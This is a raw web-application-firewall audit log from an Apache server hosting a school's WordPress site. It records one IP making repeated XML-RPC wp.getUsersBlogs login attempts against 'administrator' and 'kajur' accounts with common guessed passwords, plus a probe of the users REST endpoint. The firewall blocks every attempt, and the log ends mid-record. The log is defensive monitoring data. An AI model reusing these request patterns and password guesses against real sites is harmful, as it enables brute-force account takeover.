charset=iso-8859-1 --1529065c-E-- --1529065c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867917034695 4192 (- - -) Stopwatch2: 1749867917034695 4192; combined=3219, p1=346, p2=2688, p3=0, p4=0, p5=106, sr=80, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1529065c-Z-- --920e9b58-A-- [14/Jun/2025:09:26:01 +0700] aEzduUMWfhkd5Y0sFtrr5AAAAIk 103.236.140.4 39240 103.236.140.4 8181 --920e9b58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --920e9b58-C-- wp.getUsersBlogs administrator 1234%^&* --920e9b58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --920e9b58-E-- --920e9b58-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867961682660 4455 (- - -) Stopwatch2: 1749867961682660 4455; combined=3384, p1=371, p2=2831, p3=0, p4=0, p5=107, sr=79, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --920e9b58-Z-- --8d73c224-A-- [14/Jun/2025:09:26:20 +0700] aEzdzF3g_boun6Rx5jLSZQAAAMA 103.236.140.4 39250 103.236.140.4 8181 --8d73c224-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8d73c224-C-- wp.getUsersBlogs administrator 123asdasd --8d73c224-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d73c224-E-- --8d73c224-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867980354934 5342 (- - -) Stopwatch2: 1749867980354934 5342; combined=3792, p1=485, p2=3137, p3=0, p4=0, p5=100, sr=95, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d73c224-Z-- --e866ad10-A-- [14/Jun/2025:09:27:20 +0700] aEzeCGmwZ6YUkjOdtI7IUQAAAA0 103.236.140.4 39352 103.236.140.4 8181 --e866ad10-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e866ad10-C-- wp.getUsersBlogs administrator pa$$word1 --e866ad10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e866ad10-E-- --e866ad10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868040483703 4384 (- - -) Stopwatch2: 1749868040483703 4384; combined=3398, p1=341, p2=2890, p3=0, p4=0, p5=97, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e866ad10-Z-- --bb2a1601-A-- [14/Jun/2025:09:28:20 +0700] aEzeRF3g_boun6Rx5jLSZwAAAMU 103.236.140.4 39536 103.236.140.4 8181 --bb2a1601-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bb2a1601-C-- wp.getUsersBlogs administrator freedom --bb2a1601-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb2a1601-E-- --bb2a1601-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868100308696 4833 (- - -) Stopwatch2: 1749868100308696 4833; combined=3526, p1=363, p2=2961, p3=0, p4=0, p5=114, sr=79, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb2a1601-Z-- --435ea854-A-- [14/Jun/2025:09:29:21 +0700] aEzegWmwZ6YUkjOdtI7I8QAAAAo 103.236.140.4 39698 103.236.140.4 8181 --435ea854-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --435ea854-C-- wp.getUsersBlogs administrator iloveyou1 --435ea854-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --435ea854-E-- --435ea854-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868161150590 4838 (- - -) Stopwatch2: 1749868161150590 4838; combined=3516, p1=368, p2=2967, p3=0, p4=0, p5=103, sr=81, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --435ea854-Z-- --e0d60a2d-A-- [14/Jun/2025:09:30:21 +0700] aEzevWmwZ6YUkjOdtI7JCQAAAAg 103.236.140.4 39834 103.236.140.4 8181 --e0d60a2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e0d60a2d-C-- wp.getUsersBlogs administrator dallas --e0d60a2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0d60a2d-E-- --e0d60a2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (56+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868221628150 3815 (- - -) Stopwatch2: 1749868221628150 3815; combined=2977, p1=326, p2=2508, p3=0, p4=0, p5=83, sr=70, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0d60a2d-Z-- --bdc2757f-A-- [14/Jun/2025:09:31:21 +0700] aEze-WmwZ6YUkjOdtI7JaQAAABM 103.236.140.4 40054 103.236.140.4 8181 --bdc2757f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bdc2757f-C-- wp.getUsersBlogs administrator newcastle1 --bdc2757f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdc2757f-E-- --bdc2757f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868281212049 4339 (- - -) Stopwatch2: 1749868281212049 4339; combined=3377, p1=378, p2=2829, p3=0, p4=0, p5=99, sr=106, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdc2757f-Z-- --4d8ded76-A-- [14/Jun/2025:09:32:11 +0700] aEzfK0MWfhkd5Y0sFtrr6wAAAJI 103.236.140.4 40112 103.236.140.4 8181 --4d8ded76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.247.200.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.247.200.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4d8ded76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d8ded76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749868331977058 2548 (- - -) Stopwatch2: 1749868331977058 2548; combined=1160, p1=419, p2=713, p3=0, p4=0, p5=28, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d8ded76-Z-- --30dae106-A-- [14/Jun/2025:09:32:22 +0700] aEzfNmmwZ6YUkjOdtI7JjAAAAAU 103.236.140.4 40148 103.236.140.4 8181 --30dae106-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --30dae106-C-- wp.getUsersBlogs kajur OpF^MJrUK$SzYcOrfG --30dae106-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30dae106-E-- --30dae106-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868342241601 5242 (- - -) Stopwatch2: 1749868342241601 5242; combined=3777, p1=449, p2=3159, p3=0, p4=0, p5=100, sr=91, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30dae106-Z-- --4d8c0623-A-- [14/Jun/2025:09:33:22 +0700] aEzfcmIDXuKmWNi2UBS3NQAAAE8 103.236.140.4 40260 103.236.140.4 8181 --4d8c0623-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4d8c0623-C-- wp.getUsersBlogs kajur kajur888 --4d8c0623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d8c0623-E-- --4d8c0623-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868402001337 6149 (- - -) Stopwatch2: 1749868402001337 6149; combined=4185, p1=521, p2=3488, p3=0, p4=0, p5=104, sr=86, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d8c0623-Z-- --da9df722-A-- [14/Jun/2025:09:34:22 +0700] aEzfrmIDXuKmWNi2UBS3gAAAAEM 103.236.140.4 40432 103.236.140.4 8181 --da9df722-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --da9df722-C-- wp.getUsersBlogs kajur Marketing2010 --da9df722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da9df722-E-- --da9df722-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868462874452 4684 (- - -) Stopwatch2: 1749868462874452 4684; combined=3497, p1=358, p2=2945, p3=0, p4=0, p5=110, sr=78, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da9df722-Z-- --81887227-A-- [14/Jun/2025:09:35:22 +0700] aEzf6kMWfhkd5Y0sFtrsCwAAAIE 103.236.140.4 40552 103.236.140.4 8181 --81887227-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --81887227-C-- wp.getUsersBlogs kajur kajurPWD --81887227-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81887227-E-- --81887227-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868522192126 4170 (- - -) Stopwatch2: 1749868522192126 4170; combined=3227, p1=363, p2=2696, p3=0, p4=0, p5=97, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81887227-Z-- --32fbeb2d-A-- [14/Jun/2025:09:36:22 +0700] aEzgJmmwZ6YUkjOdtI7J_gAAAAA 103.236.140.4 40796 103.236.140.4 8181 --32fbeb2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --32fbeb2d-C-- wp.getUsersBlogs kajur Password123!@# --32fbeb2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32fbeb2d-E-- --32fbeb2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (114+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868582155364 4373 (- - -) Stopwatch2: 1749868582155364 4373; combined=3269, p1=345, p2=2757, p3=0, p4=0, p5=97, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32fbeb2d-Z-- --a58acf3a-A-- [14/Jun/2025:09:37:22 +0700] aEzgYmmwZ6YUkjOdtI7KNQAAAAU 103.236.140.4 40926 103.236.140.4 8181 --a58acf3a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a58acf3a-C-- wp.getUsersBlogs kajur 1q2w3e4r --a58acf3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a58acf3a-E-- --a58acf3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868642521044 4339 (- - -) Stopwatch2: 1749868642521044 4339; combined=3366, p1=406, p2=2795, p3=0, p4=0, p5=96, sr=97, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a58acf3a-Z-- --9628b641-A-- [14/Jun/2025:09:38:22 +0700] aEzgnmmwZ6YUkjOdtI7KewAAAAU 103.236.140.4 41090 103.236.140.4 8181 --9628b641-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9628b641-C-- wp.getUsersBlogs kajur secure --9628b641-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9628b641-E-- --9628b641-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868702176492 5370 (- - -) Stopwatch2: 1749868702176492 5370; combined=3802, p1=462, p2=3168, p3=0, p4=0, p5=101, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9628b641-Z-- --b2244120-A-- [14/Jun/2025:09:39:24 +0700] aEzg3GmwZ6YUkjOdtI7KwQAAAAo 103.236.140.4 41272 103.236.140.4 8181 --b2244120-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 